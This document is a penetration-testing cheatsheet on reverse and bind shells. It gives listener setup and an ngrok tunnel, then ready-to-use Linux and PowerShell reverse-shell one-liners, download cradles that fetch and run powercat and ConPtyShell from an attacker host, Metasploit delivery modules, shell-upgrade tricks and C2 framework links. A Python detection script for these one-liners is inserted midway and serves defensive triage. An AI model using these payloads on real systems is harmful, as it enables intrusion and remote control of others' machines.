# Reverse & Bind Shells

{% tabs %}
{% tab title="Generator" %}
{% embed url="https://www.revshells.com/" %}
Generator
{% endembed %}
{% endtab %}

{% tab title="Reverse Shell" %}
{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/" %}
Reverse Shell
{% endembed %}
{% endtab %}

{% tab title="Bind Shell" %}
{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/" %}
Bind Shell
{% endembed %}
{% endtab %}

{% tab title="Note" %}

```bash
busybox nc
```

{% endtab %}
{% endtabs %}

## Listener

{% code overflow="wrap" %}

```bash
nc -nlvp <PORT>
```

{% endcode %}

To expose the listener publicly (for example from behind NAT), tunnel it with ngrok:

{% code overflow="wrap" %}

```bash
ngrok tcp <PORT>
```

{% endcode %}

## Main

{% tabs %}
{% tab title="Linux" %}
{% code overflow="wrap" %}

```bash
/bin/bash -c 'bash -i >& /dev/tcp/<myIP>/<myPORT> 0>&1'
```

{% endcode %}

{% code overflow="wrap" %}

```bash
echo "<PayloadBASE64>" | base64 -d | sh
```

{% endcode %}

```bash
socat TCP4:<myIP>:<myPORT> EXEC:/bin/bash
```

{% endtab %}

{% tab title="Windows" %}
{% code overflow="wrap" %}

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -enc <PayloadBASE64>
```

{% endcode %}

With [powercat](https://github.com/besimorhino/powercat) hosted on the attacker machine, run the following on the target (the final `-e powershell` argument selects the program to attach):

{% code overflow="wrap" %}

```powershell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/powercat.ps1');powercat -c <IP_REV> -p <PORT_REV> -e powershell"
```

{% endcode %}

See also [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
{% endtab %}

{% tab title="Metasploit" %}
{% code overflow="wrap" %}

```
exploit/multi/script/web_delivery
```

{% endcode %}

{% code overflow="wrap" %}

```
exploit/windows/smb/smb_delivery
```

{% endcode %}
{% endtab %}
{% endtabs %}
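A defender-side complement to the one-liners above, added here and not part of the original cheatsheet: this Python scans process command lines (as exported from auditd, Sysmon or an EDR) for the traces those one-liners leave, namely the `/dev/tcp` redirect, `socat ... EXEC:`, `base64 -d | sh`, `pty.spawn`, the `TCPClient` shell and `powershell -enc`, and decodes `-enc` payloads (base64 of UTF-16LE text) so the inner script can be read and rescanned. All hosts, addresses and events in it are constructed.

```python
import base64
import re

REVSHELL_PATTERNS = [  # (indicator, regex over a process command line), derived from the one-liners on this page
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("socat exec to remote", re.compile(r"\bsocat\b.*\bTCP4?:\S+.*\bEXEC:", re.I)),
    ("base64 decoded into shell", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba|z)?sh\b")),
    ("python pty spawn", re.compile(r"\bpty\.spawn\(")),
    ("powershell TCPClient shell", re.compile(r"Net\.Sockets\.TCPClient\(.*\b(?:iex|Invoke-Expression)\b", re.I)),
    ("powershell encoded command", re.compile(r"powershell(?:\.exe)?\s.*?-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)),
]


def scan_command_line(cmdline):
    """Return [(indicator, evidence)] for one command line; -enc payloads are decoded and rescanned."""
    hits = []
    for name, rx in REVSHELL_PATTERNS:
        m = rx.search(cmdline)
        if not m:
            continue
        evidence = m.group(0)
        if name == "powershell encoded command":
            try:  # -enc takes base64 of UTF-16LE text; a malformed blob is reported as-is
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = None
            if decoded is not None:
                evidence = decoded
                hits.extend(scan_command_line(decoded))  # the payload may itself be a one-liner
        hits.append((name, evidence))
    return hits


def triage(events):
    """Group indicator names by host; hosts with no hits are omitted from the report."""
    report = {}
    for host, cmdline in events:
        for name, _evidence in scan_command_line(cmdline):
            report.setdefault(host, []).append(name)
    return report


# Constructed sample telemetry (host, command line), shaped like an auditd/EDR export.
ENC_BLOB = base64.b64encode(
    "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/x.ps1')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("web01", "/bin/bash -c 'bash -i>&/dev/tcp/10.0.0.5/4444 0>&1'"),
    ("web01", "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ("ws07", "powershell -enc " + ENC_BLOB),
    ("db02", "socat TCP4:10.0.0.5:4444 EXEC:/bin/bash"),
    ("db02", "tar -czf /backup/db.tgz /var/lib/postgresql"),  # benign control: no hit expected
]
```

`triage(SAMPLE_EVENTS)` flags web01, ws07 and db02 and leaves the tar job untouched; the decoded `-enc` script is returned as the evidence string so an analyst sees the download cradle rather than the blob.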

## TTY

{% tabs %}
{% tab title="TTY" %}

<table><thead><tr><th width="173">Description</th><th width="516">Command</th></tr></thead><tbody><tr><td>Bash</td><td><code>/bin/bash -i</code></td></tr><tr><td>Python</td><td><code>python3 -c 'import pty; pty.spawn("/bin/bash")'</code></td></tr><tr><td>Perl</td><td><code>perl -e 'exec "/bin/sh";'</code><br><code>perl: exec "/bin/sh";</code></td></tr><tr><td>Ruby</td><td><code>ruby: exec "/bin/sh"</code></td></tr><tr><td>Lua</td><td><code>lua: os.execute('/bin/sh')</code></td></tr><tr><td>AWK</td><td><code>awk 'BEGIN {system("/bin/sh")}'</code></td></tr><tr><td>Socat</td><td>On Attacker<br><code>socat file:`tty`,raw,echo=0 tcp-listen:&#x3C;PORT2></code> <br>On RevShell<br><code>socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:&#x3C;Attacker_IP>:&#x3C;PORT2></code></td></tr><tr><td><a href="https://github.com/brightio/penelope">penelope</a></td><td>Shell handler that auto-upgrades shells to PTY</td></tr><tr><td><a href="https://github.com/antonioCoco/ConPtyShell">ConPtyShell</a></td><td>Windows TTY<br><code>stty raw -echo; (stty size; cat) | nc -lvnp &#x3C;PORT></code> <br><code>IEX(IWR http://&#x3C;IP_SERVER>:&#x3C;PORT_SERVER>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell &#x3C;MY_IP> &#x3C;MY_PORT></code></td></tr><tr><td><a href="https://github.com/hanslub42/rlwrap">rlwrap</a></td><td>A readline wrapper that allows editing of keyboard input for any command.<br><code>rlwrap &#x3C;COMMAND> &#x3C;ARGS></code> <br><br><code>rlwrap -cAr nc -lnvp 80</code></td></tr><tr><td><a href="https://github.com/Fahrj/reverse-ssh">reverse-ssh</a></td><td>Statically-linked ssh server with reverse shell functionality.<br>Victim:<br><code>.\reverse-ssh.exe -p 9999</code><br>Attacker:<br><code>ssh -p 9999 &#x3C;USER>@&#x3C;TARGET></code></td></tr></tbody></table>
{% endtab %}

{% tab title="Note" %}
{% code overflow="wrap" %}

```bash
<CTRL+Z>
stty raw -echo
fg
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Command & Control (C2)

<table data-header-hidden><thead><tr><th width="171.6666259765625"></th><th></th></tr></thead><tbody><tr><td><a href="c2-and-exploitation-framework/havoc">Havoc</a></td><td>Havoc is a modern and malleable post-exploitation command and control framework with a GUI.<br><a href="https://havocframework.com/docs/welcome">Doc</a></td></tr><tr><td><a href="https://github.com/t3l3machus/Villain">Villain</a></td><td>A high-level stage 0/1 C2 framework that can handle multiple reverse TCP &#x26; HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).<br><a href="https://github.com/t3l3machus/Villain/blob/main/Usage_Guide.md">Doc</a></td></tr></tbody></table>
